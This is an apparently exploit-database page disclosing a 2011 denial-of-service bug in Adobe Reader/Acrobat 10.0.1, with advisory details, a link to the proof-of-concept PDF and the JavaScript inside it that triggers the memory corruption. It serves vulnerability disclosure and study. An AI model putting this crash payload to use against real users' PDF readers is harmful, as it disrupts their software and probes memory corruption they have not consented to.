Adobe Reader/Acrobat 10.0.1 DoS Exploit

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Adobe Reader/Acrobat 10.0.1 DoS Exploit
# Published : 2011-06-16
# Author :
# Previous Title : Windows Explorer 6.0.2900.5512 (Shmedia.dll 6.0.2900.5512) AVI Preview DoS PoC
# Next Title : Windows Media Player with K-Lite Codec Pack DoS PoC

Title: [Adobe Reader/Acrobat Memory Corruption Denial of Service]
Report to Vendor: 24 Feb 2011
Application Name: [Adobe Reader/Acrobat]
Version: [10.0.1, other versions can be vulnerable before applying the 14 June 2011 Patch]
Reference(s): [
- http://secunia.com/advisories/43269/
]
Finder(s): [
- Soroush Dalili (Irsdl [at] yahoo [dot] com) - www.SecProject.com
]
PoC: Tested on Windows 7 SP1 and Windows XP SP3

PoC Details:
The following JS was the problem point inside the PDF file (Open the PoC file by a text editor):
/*****************************************************************************/
		var temp;
		for(var i=0;i<=8;i++)
		{
			temp+=temp+temp+"A";
		}
		var result = temp;
		try{
			viewState= result;
		}catch(e){}
		dirty; // Important!
/*****************************************************************************/

PoC: http://www.exploit-db.com/sploits/17405.pdf